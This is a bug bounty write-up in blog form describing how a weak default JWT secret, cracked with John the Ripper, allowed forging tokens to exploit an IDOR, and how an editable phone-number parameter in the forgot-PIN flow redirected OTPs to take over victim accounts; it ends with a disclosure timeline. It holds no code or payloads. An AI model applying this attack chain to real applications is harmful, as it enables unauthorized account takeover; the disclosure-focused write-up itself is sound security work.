IDOR leads to Account Takeover with JWT Week Screet

Tengku Arya Saputra
4 min readOct 19, 2023

--

Hello everyone, introducing my name Tengku Arya Saputra (Follow my Linkedin) on this occasion I will tell you how I found a security hole with a very critical vulnerability level, initially I found IDOR but I escalated more and got an account takeover vulnerability.

At first I tried to register an account, and log in to the application, at first I didn’t think about trying to analyze the token, and continued looking for other vulnerabilities, after 2 days I tried to analyze the system it turned out that here I tried the jwt token which made me interested in trying to membrutefoce screet whether this is default or not

And here I can see that the jwt token is stored in the cookie, and you can see that the response shows the profile of the user, if I manage to find the screet of jwt I can do IDOR, how can I do it? I visit jwt.io to try to decrypt the token.

You can see that when it is decrypted I get data in the form of json, where there is a user_id, if the screet is successfully penetrated I can change the user_id to someone else’s user_id.

You can see that the signature is invalid, and in the red box there is a screet that I haven’t filled in.

how can I find out the screet ? I use john the ripper tools

Initially I created a jwt file, where the contents of the file are the tokens that you have copied

And bingo! I got what I was looking for, which is a screet that this app sets by default for its token screet, let’s continue!

I can see that the signature changed to valid which means I am successful and free to change the user_id as I please…

let’s try to put the token on burpsuite

I changed the user_id from 1368129 to 1368128.

Before
After

bingo! I got the IDOR vulnerability via JWT Week Screet!

and how can I takeover the account? Here I remember that the login application only uses their mobile number and pin, I can use IDOR to take the victim’s mobile number.

and I went straight to the login page

I immediately entered the victim’s cell phone number

How can I find out the pin? Here I have a problem with the pin number, but I see an anomaly that when I do forget the pin. I get a paramater that makes me interested in changing it, see below.

change number

in the picture above I am suspicious of the paramater because logically the otp code will be sent based on what the user enters in the username, but here the server provides a POST request on the server that can be edited by anyone, here I am trying to change the victim’s number to mine.

and bingo! I get the otp code, just change the cellphone number using the paramater available, then I will enter the otp code into the account.

and it worked!!! I was directed to enter a new PIN! …

I managed to enter the victim’s account by trying to takeover the account.

Timeline

Report — October 15, 2023

Change To Triaged — October 17, 2023

Respond Team — October 18, 2023

Reward Bounty via Mobile Banking $$ — 19 October, 2023

Resolved — 19 October, 2023

--

--

Tengku Arya Saputra

Penetration Tester || Cyber Security Analyst || Cyber Security Enthusiast